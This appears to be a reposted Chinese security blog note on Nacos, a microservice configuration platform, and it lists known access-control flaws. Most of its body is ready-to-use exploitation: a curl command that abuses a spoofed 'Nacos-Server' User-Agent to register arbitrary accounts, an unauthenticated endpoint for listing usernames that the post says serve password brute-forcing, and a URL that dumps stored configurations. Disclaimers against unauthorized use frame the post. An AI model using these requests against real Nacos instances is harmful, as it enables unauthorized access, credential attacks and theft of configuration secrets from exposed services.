写在前面
nacos项目常见漏洞,利用条件含量较低,简单记录一下。未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
目录
0x01 Nacos简介
0x02 漏洞详情
0x03 任意账户注册
0x04 账号接口未授权访问
0x05 配置信息泄露
Nacos简介
Nacos由阿里云研发,官网简介如下:
“Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。Nacos 是构建以“服务”为中心的现代应用架构 (例如微服务范式、云原生范式) 的服务基础设施。”内网比较常见,新版本已经提醒不要暴露到公网,暴露到公网上的还是经常能看到。
漏洞详情
Nacos官方仓库的issue中披露了Nacos存在一个由于不当处理User-Agent导致的鉴权绕过漏洞。访问/nacos 目录,ResponseBody中有Nacos就是Nacos没错了。常见的扫描工具基本都能发现。
任意账户注册
curl -XPOST 'http://xxx/nacos/v1/auth/users?username=123&password=123' -H ' User-Agent: Nacos-Server'
使用HackBar,可以快速Post。参数放到body不可行
直接放在url后面即可
账号接口未授权访问
//可直接获得账号,用于爆破密码
https://xxxxx/nacos/v1/auth/users?pageNo=1&pageSize=9
配置信息泄露
http://ip:port/nacos/v1/cs/configs?search=accurate&dataId=&group=&appName=&config_tags=&pageNo=1&pageSize=100&tenant=&namespaceId=
写在最后
本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好地维护个人信息安全、企业安全、国家安全。
未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
原文始发于微信公众号(云下信安):Nacos接口未授权访问
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论